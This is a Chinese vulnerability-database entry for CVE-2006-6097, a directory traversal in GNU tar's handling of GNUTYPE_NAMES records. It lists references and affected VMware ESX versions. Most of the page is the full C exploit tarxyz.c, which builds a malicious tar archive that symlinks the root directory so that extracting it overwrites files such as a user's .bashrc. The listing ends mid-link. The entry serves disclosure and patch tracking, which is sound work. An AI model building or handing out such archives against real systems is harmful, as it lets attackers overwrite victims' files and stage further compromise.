GNU Tar GNUTYPE_NAMES远程目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111624 漏洞类型 输入验证
发布时间 2006-11-21 更新时间 2007-03-30
CVE编号 CVE-2006-6097 CNNVD-ID CNNVD-200611-387
漏洞平台 Linux CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/29160
https://www.securityfocus.com/bid/21235
https://cxsecurity.com/issue/WLB-2006110120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-387
|漏洞详情
GNUtar可创建和解压tar文档,并进行各种存档文件管理。GNUtar在处理特定的记录时未能正确处理可能的符号链接,远程攻击者可能利用此漏洞在用户机器的任意位置创建文件。tar的extract.c文件中的extract_archive()函数和mangle.c文件中的extract_mangle()函数会处理包含有符号链接的GNUTYPE_NAMES记录类型。如果用户受骗打开了特制的tar文件的话,就会导致覆盖任意文件。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/21235/info

GNU Tar is prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. These issues present themselves when the application processes malicious archives. 

A successful attack can allow the attacker to place potentially malicious files and overwrite files on a computer in the context of the user running the affected application. Successful exploits may aid in further attacks.
*/

/*
 * tarxyz.c - GNU tar directory traversal exploit.
 * Written by Teemu Salmela.
 *
 * Example usage (creates a tar file that extracts /home/teemu/.bashrc):
 *   $ gcc -o tarxyz tarxyz.c
 *   $ ./tarxyz > ~/xyz.tar
 *   $ mkdir -p /tmp/xyz/home/teemu/
 *   $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc
 *   $ cd /tmp
 *   $ tar -rf ~/xyz.tar xyz/home/teemu
 */

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

struct posix_header
{                               /* byte offset */
   char name[100];               /*   0 */
   char mode[8];                 /* 100 */
   char uid[8];                  /* 108 */
   char gid[8];                  /* 116 */
   char size[12];                /* 124 */
   char mtime[12];               /* 136 */
   char chksum[8];               /* 148 */
   char typeflag;                /* 156 */
   char linkname[100];           /* 157 */
   char magic[6];                /* 257 */
   char version[2];              /* 263 */
   char uname[32];               /* 265 */
   char gname[32];               /* 297 */
   char devmajor[8];             /* 329 */
   char devminor[8];             /* 337 */
   char prefix[155];             /* 345 */
                                 /* 500 */
};

#define GNUTYPE_NAMES 'N'

#define BLOCKSIZE       512

union block
{
   char buffer[BLOCKSIZE];
   struct posix_header header;
};

void data(void *p, size_t size)
{
         size_t n = 0;
         char b[BLOCKSIZE];

         while (size - n > 512) {
                 fwrite(&((char *)p)[n], 1, 512, stdout);
                 n += 512;
         }
         if (size - n) {
                 memset(b, 0, sizeof(b));
                 memcpy(b, &((char *)p)[n], size - n);
                 fwrite(b, 1, sizeof(b), stdout);
         }
}

int main(int argc, char *argv[])
{
         char *link_name = "xyz";
         union block b;
         char *d;
         int i;
        unsigned int cksum;

         if (argc > 1)
                 link_name = argv[1];

         if (asprintf(&d, "Symlink / to %s\n", link_name) < 0) {
                 fprintf(stderr, "out of memory\n");
                 exit(1);
         }
         memset(&b, 0, sizeof(b));
         strcpy(b.header.name, "xyz");
         strcpy(b.header.mode, "0000777");
         strcpy(b.header.uid, "0000000");
         strcpy(b.header.gid, "0000000");
         sprintf(b.header.size, "%011o", strlen(d));
         strcpy(b.header.mtime, "00000000000");
         strcpy(b.header.chksum, "        ");
         b.header.typeflag = GNUTYPE_NAMES;
         strcpy(b.header.magic, "ustar  ");
         strcpy(b.header.uname, "root");
         strcpy(b.header.gname, "root");
         for (cksum = 0, i = 0; i < sizeof(b); i++)
                 cksum += b.buffer[i] & 0xff;
         sprintf(b.header.chksum, "%06o ", cksum);
         fwrite(&b, 1, sizeof(b), stdout);
         data(d, strlen(d));
}
|受影响的产品
VMWare ESX Server 3.0.1 VMWare ESX Server 3.0 VMWare ESX Server 2.5.4 Patch 3 VMWare ESX Server 2.5.4 Patch 1 VMWare ESX Server 2.5.4 VMWare ESX Server 2.5.3 Patch 7
|参考资料

来源:TA07-072A
名称:TA07-072A
链接:http://www.us-cert.gov/cas/techalerts/TA07-072A.html
来源:MISC
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=216937
来源:UBUNTU
名称:USN-385-1
链接:http://www.ubuntu.com/usn/usn-385-1
来源:BID
名称:21235
链接:http://www.securityfocus.com/bid/21235
来源:VUPEN
名称:ADV-2006-4717
链接:http://www.frsirt.com/english/advisories/2006/4717
来源:FULLDISC
名称:20061121GNUtardirectorytraversal
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-821
来源:www.vmware.com
链接:http://www.vmware.com/support/esx25/doc/esx-254-200702-patch.html
来源:TRUSTIX
名称:2006-0068
链接:http://www.trustix.org/errata/2006/0068/
来源:BUGTRAQ
名称:20070330VMSA-2007-0002VMwareESXsecurityupdates
链接:http://www.securityfocus.com/archive/1/archive/1/464268/100/0/threaded
来源:BUGTRAQ
名称:20061201rPSA-2006-0222-1tar
链接:http://www.securityfocus.com/archive/1/archive/1/453286/100/0/threaded
来源:OPENPKG
名称:OpenPKG-SA-2006.038
链接:http://www.o